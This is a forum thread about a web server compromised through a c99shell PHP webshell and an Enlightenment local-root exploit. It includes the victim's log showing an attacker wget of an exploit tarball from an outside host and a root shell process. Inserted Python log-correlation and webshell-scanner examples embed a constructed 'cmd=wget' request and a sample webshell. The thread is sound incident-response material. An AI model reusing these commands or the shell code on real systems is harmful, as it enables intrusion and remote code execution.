# Got hacked through Apache with Enlightenment exploit

## linumik

http://securityreason.com/exploitalert/7189

Is there a fix for this? How do I prevent that from happening again? I can't find any information and there was no security alert (I have emerge sending me notifications when there is a problem).

Anyway, I found this in the main log file, which is usually empty as I have per-site logs.

```
error: permission denied on key 'kernel.cap-bound'
error: permission denied on key 'kernel.cad_pid'
error: permission denied on key 'net.ipv4.route.flush'
error: permission denied on key 'net.ipv6.route.flush'
error: permission denied on key 'fs.binfmt_misc.register'
cat: /etc/issue.net: No such file or directory
cat: /etc/*-realise: No such file or directory
which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
error: "kern.ostype" is an unknown key
which: no lcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ruby in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no bzip in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no suidperl in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no kav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no nod32 in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no bdcored in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no uvscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sav in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no drwebd in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no rkhunter in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no chkrootkit in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ipfw in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no tripwire in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no shieldcc in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no portsentry in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no snort in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ossec in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no lidsadm in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no tcplodg in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sxid in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no logcheck in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no logwatch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sysmask in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no zmbscap in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no sawmill in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no wormscan in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no ninja in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
which: no fetch in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no links in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
which: no get in (/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/sbin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/opt/bin:/usr/i686-pc-linux-gnu/gcc-bin/4.3.4:/root/bin)
--2010-07-18 06:08:20--  http://th3-0utl4ws.com/localroot/xploits/enlightenment.tgz
Resolving th3-0utl4ws.com... 178.21.112.247
Connecting to th3-0utl4ws.com|178.21.112.247|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 98102 (96K) [application/x-tar]
Saving to: `enlightenment.tgz'
     0K .......... .......... .......... .......... .......... 52%  162K 0s
    50K .......... .......... .......... .......... .....     100%  423K=0.4s
2010-07-18 06:08:21 (230 KB/s) - `enlightenment.tgz' saved [98102/98102]
[Sun Jul 18 06:29:57 2010] [notice] caught SIGTERM, shutting down
[Sun Jul 18 08:21:01 2010] [notice] Apache configured -- resuming normal operations
[Sun Jul 18 08:21:54 2010] [notice] caught SIGTERM, shutting down
[Sun Jul 18 20:42:46 2010] [notice] Apache configured -- resuming normal operations
```

And all I could find in the running processes was:

```
root     23600     1  0 06:09 ?        00:00:00 /bin/sh -i
userSite122 23618 23600  0 06:09 ?        00:00:01 [exploit] <defunct>
root     27312 23600  0 10:18 ?        00:00:00 ping www.maritime.edu
```

This doesn't look good at all. What's the best way to check the system for trojans? Or should I just reinstall it?

----------

## ppurka

You should at least install rkhunter and chkrootkit and run them. In the long term, try to reinstall from scratch.

----------

## Hu

The main payload may have been delivered in enlightenment.tgz, but some other problem allowed the attacker to execute enough code to download and use that payload.  You need to find how the first attack got onto the system.  It is the one that spammed your logs probing for various files and processes.

----------

## linumik

*Hu wrote:*

> You need to find how the first attack got onto the system.

I can't find anything in any other logs. The only traces of the attack are in the apache-error.log that I posted. That's why I think it is some problem with Apache or maybe PHP. But I can't find anything unusual in any other logs, including the Apache logs for individual sites. I use a per-user Apache mod that might have an issue, too, but I can't find enough information to say for sure.

rkhunter didn't find any rootkits, but I guess I'm still better off reinstalling the system. I just want to figure out what I need to close first, so I don't have to go through it again.

----------

## Anarcho

My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log.

----------
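The correlation Anarcho suggests (and the "find the first attack" step Hu asks for) is mechanical enough to script. The block below is an added example, not code from anyone in this thread: it parses the two timestamp styles that appear in the posted error log (the wget banner and Apache's own `[notice]` lines), then lists the combined-format access.log requests that fall in a window around each event and marks the ones that look like webshell traffic. The access-log lines are constructed for the example (documentation-range IPs, assumed paths under a per-site directory); the indicator patterns are heuristics, and the error log and access log are assumed to share the same local clock.

```python
"""Tie a timestamp from apache-error.log back to the request that caused it.

Added example; not code from the thread. The wget banner in ERROR_LOG is the
one from the posted log, the ACCESS_LOG lines are constructed, and the
webshell indicators are heuristics (a hit is a lead, not proof).
"""
import re
from datetime import datetime, timedelta

# Formats seen in the posted error log:
#   --2010-07-18 06:08:20--  http://host/enlightenment.tgz      (wget banner)
#   [Sun Jul 18 06:29:57 2010] [notice] caught SIGTERM, ...      (Apache)
WGET_TS = re.compile(r"^--(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})--\s+(\S+)")
APACHE_TS = re.compile(r"^\[(\w{3} \w{3} +\d{1,2} \d{2}:\d{2}:\d{2} \d{4})\]")

# Apache "combined" log format.
ACCESS = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Request shapes typical of c99-style shell use.
INDICATORS = [
    (re.compile(r"[?&](cmd|act|exec|command)=", re.I), "command parameter"),
    (re.compile(r"(wget|curl|chmod|/tmp/|\.tgz)", re.I), "download/exec keyword in URL"),
    (re.compile(r"/(uploads?|tmp|cache|images)/[^/]+\.php", re.I), "PHP under upload dir"),
    (re.compile(r"\.php\.(jpe?g|gif|png|txt)", re.I), "double extension"),
]


def error_log_events(lines):
    """Return [(datetime, description)] for wget banners and Apache notices."""
    events = []
    for line in lines:
        m = WGET_TS.match(line)
        if m:
            events.append((datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
                           "wget " + m.group(2)))
            continue
        m = APACHE_TS.match(line)
        if m:
            # Collapse Apache's space-padded day ("Jul  8") before parsing.
            ts = datetime.strptime(" ".join(m.group(1).split()), "%a %b %d %H:%M:%S %Y")
            events.append((ts, line[m.end():].strip()))
    return events


def parse_access(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = ACCESS.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # The error log carries no zone: drop the offset and assume one local clock.
    rec["ts"] = datetime.strptime(rec["ts"].split()[0], "%d/%b/%Y:%H:%M:%S")
    return rec


def suspicious(rec):
    """Labels of the webshell indicators a parsed request matches."""
    hits = [label for pat, label in INDICATORS if pat.search(rec["path"])]
    if rec["method"] == "POST" and rec["path"].split("?")[0].endswith(".php"):
        hits.append("POST to PHP")
    return hits


def correlate(error_lines, access_lines,
              before=timedelta(minutes=10), after=timedelta(minutes=1)):
    """Map each error-log event to the access-log requests in [t-before, t+after].

    Entries are (ts, ip, method, path, hits), oldest first, so the request that
    triggered the download sits right next to the wget banner.
    """
    parsed = [r for r in map(parse_access, access_lines) if r]
    result = {}
    for ts, desc in error_log_events(error_lines):
        window = [(r["ts"], r["ip"], r["method"], r["path"], suspicious(r))
                  for r in parsed if ts - before <= r["ts"] <= ts + after]
        result[desc] = sorted(window)
    return result


# Constructed sample input (IPs from documentation ranges, paths assumed).
ERROR_LOG = [
    "--2010-07-18 06:08:20--  http://th3-0utl4ws.com/localroot/xploits/enlightenment.tgz",
    "[Sun Jul 18 06:29:57 2010] [notice] caught SIGTERM, shutting down",
]
ACCESS_LOG = [
    '198.51.100.7 - - [18/Jul/2010:05:40:02 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Jul/2010:06:01:10 +0000] "POST /site122/images/sh.php HTTP/1.1" 200 812 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [18/Jul/2010:06:08:19 +0000] "GET /site122/images/sh.php?act=cmd&cmd=wget%20http://198.51.100.20/e.tgz HTTP/1.1" 200 311 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [18/Jul/2010:06:30:40 +0000] "GET /about.html HTTP/1.1" 200 500 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for event, reqs in correlate(ERROR_LOG, ACCESS_LOG).items():
        print(event)
        for ts, ip, method, path, hits in reqs:
            print(f"  {ts}  {ip:<15} {method:<4} {path}  {', '.join(hits) or '-'}")
```

On a real box, feed it `apache-error.log` and every per-site access log at once (the main error log collected the wget output, but the request that launched it was logged under whichever vhost the shell lived in), and widen `before` if the shell had been sitting there for a while; the first suspicious hit from the same client IP, not the wget itself, is the upload you need to explain.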

## linumik

*Anarcho wrote:*

> My bet would be a vulnerable PHP script. You could try to find the corresponding log file entries in the access.log using the timestamp from the error log.

I found a script in one of the directories that is basically the c99shell PHP script that was used to gain access. I am trying to figure out how that script got there... The script doesn't work if safe_mode is on... which it wasn't. But with safe_mode on, many other scripts don't work either.

Anyway, about that enlightenment hack. Does anyone know if it is fixed in the latest kernel?

----------
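Finding the c99shell copy linumik describes is the part that scales badly by hand across many per-site directories. The block below is an added example, not code from the thread or from the affected site: it walks a document root, scores every PHP file by the shell-like constructs it contains (known shell names, `eval` of a decoded blob, shell commands fed straight from the request, `preg_replace` with the `/e` modifier, long base64 runs), and reports the worst first. The sample files are constructed in a temporary directory by `build_samples()`; their names and contents are assumptions, and a high score is a lead to open the file, not proof of compromise.

```python
"""Heuristic scan of a PHP document root for c99-style webshells.

Added example; not code from the thread or the hacked host. Signature weights
are a hand-tuned ranking, and the sample files are constructed here.
"""
import os
import re
import tempfile

# (pattern, weight, label)
SIGNATURES = [
    (re.compile(r"c99sh|c99shell|c999sh|r57shell", re.I), 10, "known shell name"),
    (re.compile(r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
     8, "eval of decoded payload"),
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
     8, "command from request"),
    (re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I), 3, "command execution"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I), 6, "preg_replace /e"),
    (re.compile(r"\beval\s*\(", re.I), 3, "eval"),
    (re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"), 4, "long base64 blob"),
    (re.compile(r"(chr\(\d+\)\s*\.\s*){8,}", re.I), 4, "chr() obfuscation"),
    (re.compile(r"\bsafe_mode\b|\bdisable_functions\b", re.I), 2, "probes PHP restrictions"),
]


def scan_source(text):
    """Return (score, [labels]) for one file's contents."""
    hits = [(weight, label) for pat, weight, label in SIGNATURES if pat.search(text)]
    return sum(w for w, _ in hits), [label for _, label in hits]


def scan_tree(root, exts=(".php", ".phtml", ".php5", ".inc")):
    """Scan PHP-ish files under root; return [(score, relpath, labels)], worst first."""
    report = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", encoding="utf-8", errors="replace") as fh:
                score, labels = scan_source(fh.read())
            if score:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                report.append((score, rel, labels))
    return sorted(report, key=lambda r: (-r[0], r[1]))


# Constructed sample files (assumptions, not recovered from the hacked host).
SHELL = """<?php
// c99shell v. 1.0 pre-release build #16
@set_time_limit(0);
if (!empty($_POST['cmd'])) { echo "<pre>"; passthru($_POST['cmd']); echo "</pre>"; }
eval(base64_decode("aWYgKCRfR0VUWyd4J10pIHsgZWNobyAnb2snOyB9"));
"""
OBFUSCATED = "<?php eval(gzinflate(base64_decode('" + "QUJD" * 60 + "'))); ?>\n"
BENIGN = """<?php
require_once 'lib/db.php';
$rows = $db->query('SELECT id, title FROM posts ORDER BY id DESC LIMIT 10');
foreach ($rows as $r) { echo htmlspecialchars($r['title']), "\\n"; }
"""


def build_samples():
    """Write the constructed files into a fresh temp dir; return its path."""
    root = tempfile.mkdtemp(prefix="phpscan_")
    for rel, body in (("index.php", BENIGN), ("images/sh.php", SHELL), ("cache/x.php", OBFUSCATED)):
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for score, rel, labels in scan_tree(build_samples()):
        print(f"{score:3d}  {rel:<20} {', '.join(labels)}")
```

Run it against each site's document root and sort the output by score together with the file's mtime and owning user; a fresh PHP file under an image or cache directory owned by the web server user is the usual shape of a dropped shell. Two caveats on the hardening side: the script's `safe_mode` probe is there because c99-style shells test for it, but `safe_mode` was a weak control and was removed from PHP in 5.4, so `disable_functions` (covering `system`, `exec`, `passthru`, `shell_exec`, `popen`, `proc_open`) and `open_basedir` per vhost are the settings to lean on instead; and this scanner only catches what is on disk now, so a file-integrity baseline of the kind the attacker's own script was probing for (tripwire, rkhunter) is what would have caught the drop on the day it happened.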

